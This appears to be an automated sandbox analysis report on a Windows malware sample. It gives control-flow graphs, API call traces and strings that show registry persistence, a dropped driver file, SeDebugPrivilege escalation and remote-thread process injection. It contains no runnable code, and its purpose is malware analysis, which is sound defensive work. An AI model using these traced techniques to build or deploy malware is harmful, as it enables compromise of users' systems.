                                                                                                                                                                                                                                    control_flow_graph 0 1293b60-1293c26 call 1298060 call 1292ebc LoadLibraryA 5 1293c28-1293c6d GetProcAddress * 3 0->5 6 1293c72-1293c8c LoadLibraryA 0->6 5->6 7 1293c8e-1293cec GetProcAddress * 4 6->7 8 1293cf1-1293d13 RegOpenKeyExA 6->8 7->8 9 1293d4d-1293d6f RegOpenKeyExA 8->9 10 1293d15-1293d47 RegSetValueExA RegCloseKey 8->10 11 1293da9-1293df2 lstrcpy lstrcat RegOpenKeyExA 9->11 12 1293d71-1293da3 RegSetValueExA RegCloseKey 9->12 10->9 13 1293e5f-1293e81 RegOpenKeyExA 11->13 14 1293df4-1293e59 GetModuleFileNameA wsprintfA lstrlen RegSetValueExA RegCloseKey 11->14 12->11 15 1293f15-1293f3a GetWindowsDirectoryA lstrlen 13->15 16 1293e87-1293f0f RegSetValueExA * 3 RegCloseKey 13->16 14->13 17 1293f4c-1293f7a GetComputerNameA lstrlen 15->17 18 1293f3c-1293f46 lstrcat 15->18 16->15 19 1293fc9-1294007 lstrcpy GetUserNameA lstrlen 17->19 20 1293f7c-1293fc2 lstrlen 17->20 18->17 21 1294009-1294017 lstrcpy 19->21 22 129401d-129403d call 129772b 19->22 20->19 21->22 25 129404e-1294061 lstrlen 22->25 26 12940e1-12940f0 call 1290b9a 25->26 27 1294063-129406a 25->27 34 129414d-1294157 lstrcpy 26->34 35 12940f2-1294117 GetTempPathA lstrlen 26->35 27->26 28 129406c-1294099 27->28 30 129409b-12940a4 28->30 31 12940aa-12940dc lstrlen 28->31 30->31 31->25 36 129415d-1294167 34->36 37 1294129-1294138 call 1290b9a 35->37 38 1294119-1294123 lstrcat 35->38 39 1294178-129418b lstrlen 36->39 44 129414b 37->44 45 129413a-1294145 lstrcpy 37->45 38->37 42 129418d-1294194 39->42 43 1294205-1294250 lstrcat CreateFileMappingA call 128477f call 1286274 call 1285760 call 1285c26 39->43 42->43 46 1294196-12941ca 42->46 58 1294331-1294338 call 1285760 43->58 59 1294256-129429b call 128c89a 43->59 44->36 45->44 48 12941db-1294200 lstrlen 46->48 49 12941cc-12941d5 46->49 48->39 49->48 64 129433b-129435f call 1288701 call 1284d96 call 12855be lstrlen 58->64 65 12942ac-12942b6 59->65 83 1294361 call 128a553 64->83 84 1294366-1294389 64->84 67 12942b8-12942e7 65->67 68 1294325-1294327 call 1285760 65->68 71 12942e9-12942f7 67->71 72 129431e 67->72 73 129432c-129432f 68->73 71->72 75 12942f9-1294320 call 1285e86 71->75 72->68 73->64 75->65 83->84 85 129438b-1294395 84->85 86 1294397-12943c3 call 12844cb GetTickCount wsprintfA 84->86 85->86 88 12943c6 85->88 86->88 91 12943d0-12943e0 88->91 92 12944aa-12944e3 lstrcat GetSystemDirectoryA lstrlen 91->92 93 12943e6-12943f6 91->93 95 12944f5-1294566 lstrcat * 2 GlobalAlloc * 2 92->95 96 12944e5-12944ef lstrcat 92->96 93->92 94 12943fc-129440b 93->94 94->92 98 1294411-1294447 94->98 96->95 99 1294449-1294455 98->99 100 1294457 98->100 101 1294461-12944a1 lstrlen wsprintfA 99->101 100->101 102 12944a3 101->102 103 12944a5 101->103 102->92 103->91
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 01292EBC: RegOpenKeyExA.KERNEL32(80000001,0128244C,00000000,000F003F,?,?), ref: 01292F03
                                                                                                                                                                                                                                      • Part of subcall function 01292EBC: RegSetValueExA.KERNELBASE(?,01282488,00000000,00000004,00000002,00000004), ref: 01292F31
                                                                                                                                                                                                                                      • Part of subcall function 01292EBC: RegCloseKey.KERNEL32(?), ref: 01292F3E
                                                                                                                                                                                                                                      • Part of subcall function 01292EBC: lstrcpy.KERNEL32(00000000,01282550), ref: 01292F99
                                                                                                                                                                                                                                      • Part of subcall function 01292EBC: lstrcat.KERNEL32(00000000,01282548), ref: 01292FAC
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(01282154), ref: 01293C13
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,0128278C), ref: 01293C36
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012827A0), ref: 01293C4E
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012827B0), ref: 01293C67
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(01282894), ref: 01293C79
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012828D8), ref: 01293C9C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012828B0), ref: 01293CB5
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012828C4), ref: 01293CCD
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,012828A0), ref: 01293CE6
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,012821D4,00000000,000F003F,00000000), ref: 01293D0B
                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,012821C0,00000000,00000004,00000000,00000004), ref: 01293D3A
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01293D47
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,012822EC,00000000,000F003F,00000000), ref: 01293D67
                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,01282328,00000000,00000004,00000000,00000004), ref: 01293D96
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 01293DA3
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282384), ref: 01293DB7
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0128242C), ref: 01293DCA
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,000F003F,00000000), ref: 01293DEA
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000200), ref: 01293E02
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01293E1C
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01293E2C
                                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 01293E4C
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 01293E59
                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,01282384,00000000,000F003F,00000000), ref: 01293E79
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,0128274C,00000000,00000004,00000000,00000004), ref: 01293EAC
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(00000000,0128275C,00000000,00000004,00000000,00000004), ref: 01293ED7
                                                                                                                                                                                                                                    • RegSetValueExA.KERNEL32(00000000,01282774,00000000,00000004,00000001,00000004), ref: 01293F02
                                                                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 01293F0F
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: lstrcpy.KERNEL32(?,?), ref: 01290BC8
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: GetTickCount.KERNEL32 ref: 01290BCE
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: lstrlen.KERNEL32(?,01283D08,00000000), ref: 01290BE1
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: wsprintfA.USER32 ref: 01290BEF
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 01290C0E
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: CloseHandle.KERNEL32(?), ref: 01290C2A
                                                                                                                                                                                                                                      • Part of subcall function 01290B9A: DeleteFileA.KERNEL32(?), ref: 01290C37
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(C:\Windows\,00000104), ref: 01293F1F
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\), ref: 01293F2A
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\,01283E20), ref: 01293F46
                                                                                                                                                                                                                                    • GetComputerNameA.KERNEL32(00000000,00000080), ref: 01293F64
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293F71
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293F8F
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(Software\Erlloywmr,Software\), ref: 01293FD3
                                                                                                                                                                                                                                    • GetUserNameA.ADVAPI32(00000000,00000080), ref: 01293FF1
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 01293FFE
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,01282364), ref: 01294017
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 01294055
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(Software\Erlloywmr), ref: 012940D0
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(000000E4,C:\Windows\mqiwauwsp.log), ref: 012940FC
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\mqiwauwsp.log), ref: 01294107
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\mqiwauwsp.log,01283E30), ref: 01294123
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(C:\Windows\mqiwauwsp.log,01282100), ref: 01294145
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(C:\Windows\mqiwauwsp.log,C:\Windows\), ref: 01294157
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 0129417F
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\mqiwauwsp.log), ref: 012941F4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\mqiwauwsp.log,0128266C), ref: 01294211
                                                                                                                                                                                                                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00015400,01282370), ref: 0129422A
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(46390628699), ref: 01294357
                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 012943AA
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 012943BD
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,01283E34,?), ref: 01294474
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01294482
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,0128226C), ref: 012944B8
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,00000080), ref: 012944C8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys), ref: 012944D3
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,01283E38), ref: 012944EF
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,01282288), ref: 01294501
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(C:\Windows\system32\drivers\npjnsn.sys,?), ref: 01294513
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01294520
                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00020000), ref: 01294532
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$lstrcat$AddressProcValuelstrcpy$Close$Open$Filewsprintf$Name$AllocCountCreateDirectoryGlobalLibraryLoadTick$ComputerDeleteHandleMappingModulePathSystemTempUserWindows
                                                                                                                                                                                                                                    • String ID: 46390628699$C:\Windows\mqiwauwsp.log$C:\Windows\system32\drivers\npjnsn.sys$Software\$Software\Erlloywmr$fronC:\Windows\$n
                                                                                                                                                                                                                                    • API String ID: 1097455987-1778184363
                                                                                                                                                                                                                                    • Opcode ID: e3025eff597879ba540d77932ed0d7889ab4330db3bd79e045dcc3400e5ab868
                                                                                                                                                                                                                                    • Instruction ID: 26665bc39ebdcc4d5392778a06bbae56300b9d29e7af92577abffad0a5611e46
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e3025eff597879ba540d77932ed0d7889ab4330db3bd79e045dcc3400e5ab868
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4142E4B0A10654DFDF24DBA8EC9DBAA77B5FF88705F0081D8E609962D4DB706A84CF50
                                                                                                                                                                                                                                    Function 0128E329 Relevance: 96.7, APIs: 42, Strings: 12, Instructions: 2219COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExchangeInterlocked
                                                                                                                                                                                                                                    • String ID: .adata$2$CreateFileA$CreateFileW$GetProcAddress$M$$OpenFile$PE$_lopen$d$d$d
                                                                                                                                                                                                                                    • API String ID: 367298776-1942104897
                                                                                                                                                                                                                                    • Opcode ID: 473d0e28adef39b39ded3938f04ab7ad0cf5a099a8e39de6ef07ac6c8d8462f3
                                                                                                                                                                                                                                    • Instruction ID: 95c4938438d9a8a6b0c7d4a4dc89be5aa304bba51812c6770e3e41b089866c0b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 473d0e28adef39b39ded3938f04ab7ad0cf5a099a8e39de6ef07ac6c8d8462f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C73349B1D11229DFDB24DF58CD84BE9B7B5BB84304F1881E9E20AAB285D7319A84CF54
                                                                                                                                                                                                                                    Function 01291EF6 Relevance: 75.6, APIs: 38, Strings: 5, Instructions: 382memorythreadCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 681 1291ef6-1291ff4 call 1298060 OpenProcess 684 1291ffa-1292003 GetLastError 681->684 685 12921a7-12921bf OpenProcessToken 681->685 686 1292009-1292040 GetVersionExA 684->686 687 129219b-12921a2 684->687 688 12921cd-12921e9 GetTokenInformation 685->688 689 12921c1-12921c8 685->689 691 129204e-1292072 GetCurrentThread OpenThreadToken 686->691 692 1292042-1292049 686->692 690 12924ab-12924b2 687->690 693 12921eb-12921f2 688->693 694 12921f7-1292200 GetLastError 688->694 689->690 695 12924cb-12924d2 690->695 696 12924b4-12924c1 CloseHandle 690->696 697 12920b3-1292103 LookupPrivilegeValueA AdjustTokenPrivileges 691->697 698 1292074-129207f GetLastError 691->698 692->690 693->690 699 129220e-1292231 GetProcessHeap RtlAllocateHeap 694->699 700 1292202-1292209 694->700 701 12924e1-12924e8 695->701 702 12924d4-12924db CloseHandle 695->702 696->695 707 129211e-1292129 GetLastError 697->707 708 1292105-1292119 CloseHandle 697->708 703 129208d-12920a5 GetCurrentProcess OpenProcessToken 698->703 704 1292081-1292088 698->704 705 129223f-1292265 GetTokenInformation 699->705 706 1292233-129223a 699->706 700->690 709 12924ea-12924fa GetProcessHeap HeapFree 701->709 710 1292500-1292513 701->710 702->701 703->697 711 12920a7-12920ae 703->711 704->690 712 1292273-12922b9 LookupAccountSidA 705->712 713 1292267-129226e 705->713 706->690 714 129212b-129213f CloseHandle 707->714 715 1292144-129218b OpenProcess AdjustTokenPrivileges CloseHandle 707->715 708->690 709->710 711->690 716 12922bb-12922c2 712->716 717 12922c7-12922d0 712->717 713->690 714->690 718 1292199 715->718 719 129218d-1292194 715->719 716->690 720 1292330-1292337 717->720 721 12922d2-12922e6 lstrcmpiA 717->721 718->685 719->690 720->690 722 12922e8-12922fc lstrcmpiA 721->722 723 1292314-1292329 CreateMutexA 721->723 722->723 724 12922fe-1292312 lstrcmpiA 722->724 723->690 724->723 725 129232e-1292364 VirtualAllocEx 724->725 727 12923cd-12923f5 VirtualAllocEx 725->727 728 1292366-129238a WriteProcessMemory 725->728 731 12923fb-1292455 call 129772b lstrlen call 129772b WriteProcessMemory 727->731 732 1292492-1292499 727->732 729 1292398-12923b8 CreateRemoteThread 728->729 730 129238c-1292393 728->730 733 12923ba-12923c1 729->733 734 12923c6 729->734 730->690 739 1292460-1292480 CreateRemoteThread 731->739 740 1292457-129245e 731->740 732->690 733->690 734->727 741 129248b 739->741 742 1292482-1292489 739->742 740->690 741->732 742->690
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,0000000A), ref: 01291FE1
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 01291FFA
                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32(00000094), ref: 01292033
                                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 01292063
                                                                                                                                                                                                                                    • OpenThreadToken.ADVAPI32(00000000), ref: 0129206A
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 01292074
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 012921B7
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 012924BB
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 012924DB
                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012924F3
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 012924FA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: OpenProcess$CloseErrorHandleHeapLastThreadToken$CurrentFreeVersion
                                                                                                                                                                                                                                    • String ID: P$SeDebugPrivilege$local service$network service$system
                                                                                                                                                                                                                                    • API String ID: 3470919082-3830299594
                                                                                                                                                                                                                                    • Opcode ID: f4885eb569cda6e93c41bb0ff35d6bf63bb261f2d9f8caf9247b10bf3e8cc2c8
                                                                                                                                                                                                                                    • Instruction ID: 34f248fce56a3a869a0219e909ee080a8b59bb30f2ce6858bf3fbc03dcd96eea
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4885eb569cda6e93c41bb0ff35d6bf63bb261f2d9f8caf9247b10bf3e8cc2c8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57F17D74A20259EBEF30CFA8DC49BED7778FB48711F108288E615A61C4D7B46A94CF50
                                                                                                                                                                                                                                    Function 01291060 Relevance: 45.8, APIs: 20, Strings: 6, Instructions: 340stringsleepfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 743 1291060-12910d2 Sleep 744 12910ec-12910ff call 1288deb 743->744 745 12910d4-12910e9 lstrcat 743->745 748 1291101-1291112 744->748 749 1291117-129113b lstrcat FindFirstFileA 744->749 745->744 750 12914c8-12914d8 748->750 751 129144c-1291457 749->751 752 1291141-1291151 FindNextFileA 749->752 754 1291459-1291461 751->754 755 1291492-12914af 751->755 752->751 753 1291157-1291161 752->753 756 1291163 753->756 757 1291165-129116e 753->757 754->755 758 1291463-1291467 754->758 760 12914bb-12914c6 Sleep 755->760 761 12914b1-12914b5 FindClose 755->761 756->752 762 1291170 757->762 763 1291175-1291179 757->763 758->755 764 1291469-129146d 758->764 760->750 761->760 762->751 765 129117b-1291199 Sleep 763->765 766 129119f-12911b7 lstrlen 763->766 764->755 767 129146f-1291488 call 1290e71 764->767 765->766 768 12911b9-12911c2 766->768 769 12911c7-1291201 lstrcat lstrlen * 2 766->769 767->755 768->752 771 1291297-12912a2 769->771 772 1291207-129121c lstrcmpiA 769->772 774 12912a8-12912b0 771->774 775 1291381-1291394 771->775 776 129121e-1291234 lstrcmpiA 772->776 777 1291236-129123d 772->777 774->775 781 12912b6-12912c0 774->781 778 129139a-12913a4 775->778 779 129143e-1291447 775->779 776->771 776->777 780 1291248-1291257 777->780 778->779 782 12913aa-12913f5 lstrcpy lstrlen lstrcmpiA 778->782 779->752 783 1291259-1291275 call 1288deb 780->783 784 1291287-1291294 call 128e329 780->784 785 129133d-1291353 call 1288deb 781->785 786 12912c2-12912d8 call 1288deb 781->786 788 1291424-129143b 782->788 789 12913f7-129141c call 1291060 782->789 800 1291285 783->800 801 1291277-1291282 call 128a26e 783->801 784->771 785->775 802 1291355-1291368 call 1290cf6 785->802 786->785 798 12912da-12912f0 call 1288deb 786->798 788->779 799 1291421 789->799 798->785 810 12912f2-1291338 lstrcpy lstrcat 798->810 799->788 800->780 801->800 811 129136a-129136e DeleteFileA 802->811 812 1291374-1291378 802->812 810->785 811->812 812->775 813 129137a 812->813 813->775
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcatlstrlen$FileFindSleeplstrcmpi$lstrcpy$CloseDeleteFirstNext
                                                                                                                                                                                                                                    • String ID: .lnk$.lnk$.lnk$.tmp$C:\Windows\$d
                                                                                                                                                                                                                                    • API String ID: 3707883041-2096895072
                                                                                                                                                                                                                                    • Opcode ID: 584960cee14a85f72c37938862dceb32a34d6079830efa50fdcaa0d2676465a8
                                                                                                                                                                                                                                    • Instruction ID: 0b58fff1f1a7f75d03b08b1cc68912ac23ea9c4a123286d2456d3fb831554c3f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 584960cee14a85f72c37938862dceb32a34d6079830efa50fdcaa0d2676465a8
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCD1BEB5A1020AABDF14DF69D885BAE3BB5FF88315F14C118F915DB285D335E820CBA4
                                                                                                                                                                                                                                    Function 01292514 Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 153stringsynchronizationprocessCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 01292545
                                                                                                                                                                                                                                    • Process32First.KERNEL32(00000000,00000128), ref: 01292584
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000128,00000002,00000000), ref: 012925A5
                                                                                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012925C0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 012925D6
                                                                                                                                                                                                                                    • CharLowerA.USER32(00000000), ref: 012925E3
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012925FC
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0129260A
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0129261E
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0129262A
                                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 0129263D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0129264A
                                                                                                                                                                                                                                    • Process32Next.KERNEL32(00000000,00000128), ref: 0129267D
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?,00000000,00000128,00000000,00000128,00000000,00000128,00000002,00000000), ref: 0129269E
                                                                                                                                                                                                                                    • lstrcpyn.KERNEL32(00000000,?,00000040), ref: 012926B9
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,?), ref: 012926CF
                                                                                                                                                                                                                                    • CharLowerA.USER32(00000000), ref: 012926DC
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,M_%d_,0000000A), ref: 012926F5
                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 01292703
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 01292717
                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 01292723
                                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(?), ref: 01292736
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 01292743
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,00000002,00000000), ref: 01292774
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2239813722.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01260000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001260000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001307000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.000000000130D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2239813722.0000000001315000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1260000_PfBjDhHzvV.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Mutexlstrlen$CloseCreateHandle$CharErrorLastLowerProcess32Releaselstrcpylstrcpynwsprintf$FirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                    • String ID: M_%d_$M_%d_
                                                                                                                                                                                                                                    • API String ID: 3105503624-485321427
                                                                                                                                                                                                                                    • Opcode ID: 15e135cff8904ada979803181d7fa09d1cb7b8f45b7f8e802861b332618d3cb7
                                                                                                                                                                                                                                    • Instruction ID: ddaee7e83282372504ad02e7092569cc1ab98cae541a4d7eaedb7b1abc6b1d0a
